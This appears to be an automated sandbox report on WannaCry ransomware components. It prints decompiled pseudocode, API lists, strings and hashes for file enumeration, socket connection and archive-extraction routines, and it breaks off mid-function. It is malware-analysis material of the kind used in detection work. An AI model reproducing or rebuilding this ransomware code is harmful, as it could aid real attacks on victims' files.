Instruction ID: b735bfb2d4c14645f341b606901ad4f9af47e45cc28c7d2ea722b83d512bfbf9
Opcode Fuzzy Hash: d8cc844e41db627e1c4436b7b7a073ec45db5ac64ec8fc819127fe6e53c62420
Instruction Fuzzy Hash: 81410275300B008FC720DF19DAC4A6AB7E6FB89710B14897EE5569B7A0CB79AC01CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401000(intOrPtr _a4, wchar_t* _a8) {
				wchar_t* _t11;
				wchar_t* _t22;

				_t22 = _a8;
				GetWindowsDirectoryW(_t22, 0x104);
				_t11 = _a4 + 0x41;
				if(0 != _t11) {
					swprintf(_t22, 0x403010, _t11, 0x403020);
					goto L5;
				} else {
					GetTempPathW(0x104, _t22);
					if(wcslen(_t22) <= 0 ||  *((short*)(_t22 + wcslen(_t22) * 2 - 2)) != 0x5c) {
						L5:
						return _t22;
					} else {
						 *((short*)(_t22 + wcslen(_t22) * 2 - 2)) = 0;
						return _t22;
					}
				}
			}

0x00401001
0x0040100c
0x0040101b
0x00401020
0x0040106a
0x00000000
0x00401022
0x00401028
0x0040103c
0x00401073
0x00401077
0x0040104c
0x00401052
0x0040105d
0x0040105d
0x0040103c

APIs

GetWindowsDirectoryW.KERNEL32(00000019,00000104,757F0F00,00000019,004010D5,?,?,757F0F00,00000019,757F3300,00000000), ref: 0040100C
GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
wcslen.MSVCRT ref: 00401035
wcslen.MSVCRT ref: 0040103F
wcslen.MSVCRT ref: 0040104D
swprintf.MSVCRT(00000019,00403010,?,00403020), ref: 0040106A

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: wcslen$DirectoryPathTempWindowsswprintf
String ID:
API String ID: 30654359-0
Opcode ID: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
Instruction ID: 00ede0775e497762771a1e7050bb3ecf99d0a0070f097ddb1d391ed7ba2ca3cf
Opcode Fuzzy Hash: 4e66369f8c42ca16cc11ceda3156b996b8b268552c228e5f165bda1afb4dc665
Instruction Fuzzy Hash: ADF0C87170122067E7206B2CBD0AE9F77A8EF85315B01403AF786B62D0D2B55A5586EE

Uniqueness

Uniqueness Score: -1.00%

Function 004013D0 Relevance: 7.8, APIs: 5, Instructions: 264
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E004013D0(signed int __ecx) {
				signed int _t67;
				signed int _t68;
				signed int _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				intOrPtr _t81;
				intOrPtr _t91;
				intOrPtr _t95;
				intOrPtr _t98;
				signed int _t99;
				intOrPtr _t101;
				signed int _t104;
				intOrPtr _t105;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t108;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t121;
				signed int _t127;
				intOrPtr _t135;
				signed int _t136;
				void* _t139;
				intOrPtr _t140;
				void* _t141;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				void* _t146;
				signed int _t147;
				intOrPtr _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr _t152;
				signed int _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				signed int _t157;
				intOrPtr _t158;
				signed int _t159;
				void* _t160;
				void* _t161;

				_t109 = __ecx;
				_t144 =  *((intOrPtr*)(__ecx + 8));
				_t136 =  *(_t160 + 0x24);
				_t67 =  *((intOrPtr*)(__ecx + 0xc)) - _t144 >> 4;
				 *(_t160 + 0x10) = __ecx;
				if(_t67 >= _t136) {
					_t104 =  *(_t160 + 0x20);
					if(_t144 - _t104 >> 4 >= _t136) {
						if(_t136 > 0) {
							_t68 = _t136 << 4;
							_t139 = _t144 - _t68;
							_t156 = _t144;
							 *(_t160 + 0x20) = _t68;
							if(_t139 == _t144) {
								L37:
								_t140 =  *((intOrPtr*)(_t109 + 8));
								_t146 = _t140 - _t68;
								if(_t104 == _t146) {
									L40:
									_t141 = _t68 + _t104;
									_t147 = _t104;
									if(_t104 == _t141) {
										goto L44;
									}
									_t105 =  *((intOrPtr*)(_t160 + 0x28));
									do {
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t105, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
										_t147 = _t147 + 0x10;
									} while (_t147 != _t141);
									_t109 =  *(_t160 + 0x10);
									_t68 =  *(_t160 + 0x20);
									goto L44;
								} else {
									goto L38;
								}
								do {
									L38:
									_t146 = _t146 - 0x10;
									_t140 = _t140 - 0x10;
									__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t146, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
								} while (_t146 != _t104);
								_t109 =  *(_t160 + 0x10);
								_t68 =  *(_t160 + 0x20);
								goto L40;
							} else {
								goto L35;
							}
							do {
								L35:
								E00401690(__ecx, _t156, _t139);
								_t139 = _t139 + 0x10;
								_t160 = _t160 + 8;
								_t156 = _t156 + 0x10;
							} while (_t139 != _t144);
							_t109 =  *(_t160 + 0x10);
							_t68 =  *(_t160 + 0x20);
							goto L37;
						}
						return _t67;
					} else {
						_t157 = _t104;
						_t68 = _t136 << 4;
						 *(_t160 + 0x20) = _t68;
						_t127 = _t68 + _t104;
						if(_t104 != _t144) {
							 *(_t160 + 0x24) = _t127;
							do {
								E00401690(_t109,  *(_t160 + 0x24), _t157);
								_t116 =  *((intOrPtr*)(_t160 + 0x2c));
								_t157 = _t157 + 0x10;
								_t160 = _t160 + 8;
								_t109 = _t116 + 0x10;
								 *(_t160 + 0x24) = _t116 + 0x10;
							} while (_t157 != _t144);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t148 =  *((intOrPtr*)(_t109 + 8));
						_t158 =  *((intOrPtr*)(_t160 + 0x28));
						_t142 = _t136 - (_t148 - _t104 >> 4);
						if(_t142 != 0) {
							do {
								E00401690(_t109, _t148, _t158);
								_t160 = _t160 + 8;
								_t148 = _t148 + 0x10;
								_t142 = _t142 - 1;
							} while (_t142 != 0);
							_t68 =  *(_t160 + 0x20);
							_t109 =  *(_t160 + 0x10);
						}
						_t143 =  *((intOrPtr*)(_t109 + 8));
						_t149 = _t104;
						if(_t104 == _t143) {
							L44:
							 *((intOrPtr*)(_t109 + 8)) =  *((intOrPtr*)(_t109 + 8)) + _t68;
							return _t68;
						} else {
							goto L31;
						}
						do {
							L31:
							__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z(_t158, 0,  *__imp__?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB);
							_t149 = _t149 + 0x10;
						} while (_t149 != _t143);
						_t115 =  *(_t160 + 0x10);
						_t73 =  *(_t160 + 0x20);
						 *((intOrPtr*)(_t115 + 8)) =  *((intOrPtr*)( *(_t160 + 0x10) + 8)) + _t73;
						return _t73;
					}
				} else {
					_t117 =  *((intOrPtr*)(__ecx + 4));
					if(_t117 == 0) {
						L3:
						_t77 = _t136;
					} else {
						_t77 = _t144 - _t117 >> 4;
						if(_t136 >= _t77) {
							goto L3;
						}
					}
					if(_t117 != 0) {
						_t151 = _t144 - _t117 >> 4;
					} else {
						_t151 = 0;
					}
					_t78 = _t77 + _t151;
					 *(_t160 + 0x14) = _t78;
					if(_t78 < 0) {
						_t78 = 0;
					}
					_t79 = _t78 << 4;
					_push(_t79);
					L004018F0();
					_t159 =  *(_t160 + 0x14);
					 *(_t160 + 0x1c) = _t79;
					_t106 = _t79;
					_t152 =  *((intOrPtr*)(_t159 + 4));
					_t161 = _t160 + 4;
					if(_t152 !=  *(_t160 + 0x24)) {
						do {
							E00401690(_t117, _t106, _t152);
							_t101 =  *((intOrPtr*)(_t161 + 0x28));
							_t152 = _t152 + 0x10;
							_t161 = _t161 + 8;
							_t106 = _t106 + 0x10;
						} while (_t152 != _t101);
					}
					_t153 = _t106;
					if(_t136 > 0) {
						 *(_t161 + 0x24) = _t136;
						do {
							_t117 =  *((intOrPtr*)(_t161 + 0x28));
							E00401690( *((intOrPtr*)(_t161 + 0x28)), _t153,  *((intOrPtr*)(_t161 + 0x28)));
							_t98 =  *((intOrPtr*)(_t161 + 0x2c));
							_t161 = _t161 + 8;
							_t153 = _t153 + 0x10;
							_t99 = _t98 - 1;
							 *(_t161 + 0x24) = _t99;
						} while (_t99 != 0);
					}
					_t154 =  *((intOrPtr*)(_t161 + 0x20));
					_t81 = (_t136 << 4) + _t106;
					_t107 =  *((intOrPtr*)(_t159 + 8));
					if(_t154 != _t107) {
						 *((intOrPtr*)(_t161 + 0x20)) = _t81;
						do {
							_t81 = E00401690(_t117,  *((intOrPtr*)(_t161 + 0x20)), _t154);
							_t121 =  *((intOrPtr*)(_t161 + 0x28));
							_t154 = _t154 + 0x10;
							_t161 = _t161 + 8;
							_t117 = _t121 + 0x10;
							 *((intOrPtr*)(_t161 + 0x20)) = _t121 + 0x10;
						} while (_t154 != _t107);
					}
					_t108 =  *((intOrPtr*)(_t159 + 8));
					_t155 =  *((intOrPtr*)(_t159 + 4));
					while(_t155 != _t108) {
						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
						_t155 = _t155 + 0x10;
					}
					E004018D0(_t81,  *((intOrPtr*)(_t159 + 4)));
					_t135 =  *((intOrPtr*)(_t161 + 0x1c));
					_t119 =  *((intOrPtr*)(_t159 + 4));
					 *((intOrPtr*)(_t159 + 0xc)) = ( *(_t161 + 0x18) << 4) + _t135;
					if(_t119 != 0) {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t91 = (( *((intOrPtr*)(_t159 + 8)) - _t119 >> 4) + _t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t91;
						return _t91;
					} else {
						 *((intOrPtr*)(_t159 + 4)) = _t135;
						_t95 = (_t136 << 4) + _t135;
						 *((intOrPtr*)(_t159 + 8)) = _t95;
						return _t95;
					}
				}
			}

0x004013d0
0x004013d9
0x004013dd
0x004013e3
0x004013e8
0x004013ec
0x0040152b
0x00401538
0x004015e9
0x004015f2
0x004015f6
0x004015f8
0x004015fc
0x00401600
0x0040161e
0x0040161e
0x00401623
0x00401627
0x0040164f
0x0040164f
0x00401652
0x00401656
0x00000000
0x00000000
0x00401658
0x0040165c
0x0040166a
0x00401670
0x00401673
0x00401677
0x0040167b
0x00000000
0x00000000
0x00000000
0x00000000
0x00401629
0x00401629
0x0040162f
0x00401632
0x0040163d
0x00401643
0x00401647
0x0040164b
0x00000000
0x00000000
0x00000000
0x00000000
0x00401602
0x00401602
0x00401604
0x00401609
0x0040160c
0x0040160f
0x00401612
0x00401616
0x0040161a
0x00000000
0x0040161a
0x00401689
0x0040153e
0x00401540
0x00401542
0x00401547
0x0040154b
0x0040154e
0x00401550
0x00401554
0x0040155a
0x0040155f
0x00401563
0x00401566
0x00401569
0x0040156e
0x0040156e
0x00401574
0x00401578
0x00401578
0x0040157c
0x0040157f
0x0040158a
0x0040158c
0x0040158e
0x00401590
0x00401595
0x00401598
0x0040159b
0x0040159b
0x0040159e
0x004015a2
0x004015a2
0x004015a6
0x004015a9
0x004015ad
0x0040167f
0x0040167f
0x00000000
0x00000000
0x00000000
0x00000000
0x004015b3
0x004015b3
0x004015c0
0x004015c6
0x004015c9
0x004015cd
0x004015d1
0x004015de
0x004015e4
0x004015e4
0x004013f2
0x004013f2
0x004013f7
0x00401404
0x00401404
0x004013f9
0x004013fd
0x00401402
0x00000000
0x00000000
0x00401402
0x00401408
0x00401410
0x0040140a
0x0040140a
0x0040140a
0x00401413
0x00401417
0x0040141b
0x0040141d
0x0040141d
0x0040141f
0x00401422
0x00401423
0x00401428
0x0040142c
0x00401430
0x00401436
0x00401439
0x0040143e
0x00401440
0x00401442
0x00401447
0x0040144b
0x0040144e
0x00401451
0x00401454
0x00401440
0x0040145a
0x0040145c
0x0040145e
0x00401462
0x00401462
0x00401468
0x0040146d
0x00401471
0x00401474
0x00401477
0x00401478
0x00401478
0x00401462
0x0040147e
0x00401487
0x0040148a
0x0040148f
0x00401491
0x00401495
0x0040149b
0x004014a0
0x004014a4
0x004014a7
0x004014aa
0x004014af
0x004014af
0x00401495
0x004014b5
0x004014b8
0x004014bd
0x004014c3
0x004014c9
0x004014cc
0x004014d4
0x004014dd
0x004014e1
0x004014ee
0x004014f1
0x0040150f
0x0040151d
0x00401520
0x00401528
0x004014f3
0x004014f5
0x004014fe
0x00401501
0x00401509
0x00401509
0x004014f1

APIs

??2@YAPAXI@Z.MSVCRT ref: 00401423
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,76115320,00000000,00000000,?,?,00000001,?), ref: 004015C0
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,76115320,00000000,00000000,?,?,00000001,?), ref: 0040163D
?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,76115320,00000000,00000000,?,?,00000001,?), ref: 0040166A

Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000,?,?), ref: 004016EE
Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,76115320,00000000,00000000,?,?), ref: 004016F6
Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742

Memory Dump Source

Source File: 00000006.00000002.839432959.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.839396780.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839471092.0000000000402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.839500405.0000000000404000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_taskdl.jbxd

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@$Split@?$basic_string@$??2@Eos@?$basic_string@Grow@?$basic_string@Tidy@?$basic_string@Xran@std@@
String ID:
API String ID: 3154500504-0
Opcode ID: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
Instruction ID: 1a94831c173c9211e28d46cdbba668eac71917d736910117d3345b582314b656
Opcode Fuzzy Hash: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
Instruction Fuzzy Hash: FA81B472A003109BD710DE18CC8492AB7E5FBC8358F094A3EED49BB391D636EE05CB95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: @WanaDecryptor@.exePID: 8616, Parent PID: 2584COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.3%
Total number of Nodes:	1584
Total number of Limit Nodes:	17

Executed Functions

Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				struct _IO_FILE* _t61;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb"); // executed
				_t47 = FindFirstFileA("*.res", _t74); // executed
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74); // executed
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t61 = fopen( &_v1476, "rb"); // executed
									_t105 = _t61;
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105); // executed
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105); // executed
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}

0x004080c9
0x004080d7
0x004080d9
0x004080e3
0x004080f3
0x004080f7
0x004080f7
0x004080f9
0x004080fb
0x00408102
0x00408110
0x00408111
0x0040811a
0x0040811e
0x0040820a
0x0040821c
0x00408237
0x00408266
0x0040826c
0x00408276
0x0040827b
0x00408280
0x00408285
0x00408287
0x0040828f
0x004082b8
0x004082b8
0x00408291
0x0040829d
0x004082a2
0x00000000
0x00408124
0x0040812a
0x004081e4
0x004081e4
0x004081e8
0x004081f1
0x004081f7
0x004081f9
0x00408130
0x00408138
0x0040814a
0x00408152
0x0040816a
0x00408170
0x00408176
0x00408185
0x00408187
0x00408189
0x0040818e
0x004081a0
0x004081a2
0x004081a8
0x004081b9
0x004081b9
0x004081be
0x004081cb
0x004081d0
0x004081e2
0x004081e2
0x004081e2
0x004081d0
0x0040818e
0x00408176
0x00408152
0x00000000
0x004081ff
0x00408200
0x00408206
0x00000000
0x00408206
0x004081f9

APIs

FindFirstFileA.KERNELBASE(*.res,?), ref: 00408111
sscanf.MSVCRT ref: 0040816A
fopen.MSVCRT ref: 00408185
fread.MSVCRT ref: 004081A0
fclose.MSVCRT ref: 004081BE
FindNextFileA.KERNELBASE(?,00000010), ref: 004081F1
FindClose.KERNEL32(?), ref: 00408200
sprintf.MSVCRT ref: 00408266
#537.MFC42(?,?,00000000), ref: 00408280
#537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2

Strings

%08X.res, xrefs: 00408164
*.res, xrefs: 0040810B
---%s%s%d%I64d%d, xrefs: 00408260

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
String ID: %08X.res$*.res$---%s%s%d%I64d%d
API String ID: 1530363904-2310201135
Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32 ref: 0040D6C7
socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
bind.WS2_32(00000000,?,00000010), ref: 0040D709
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
connect.WS2_32(00000000,?,00000010), ref: 0040D73A
select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
__WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
__WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
setsockopt.WS2_32(00000000), ref: 0040D7DD
setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
closesocket.WS2_32(00000000), ref: 0040D80E

Strings

`, xrefs: 0040D7D5

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
String ID: `
API String ID: 478405425-1850852036
Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150); // executed
										L00412CEC(); // executed
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
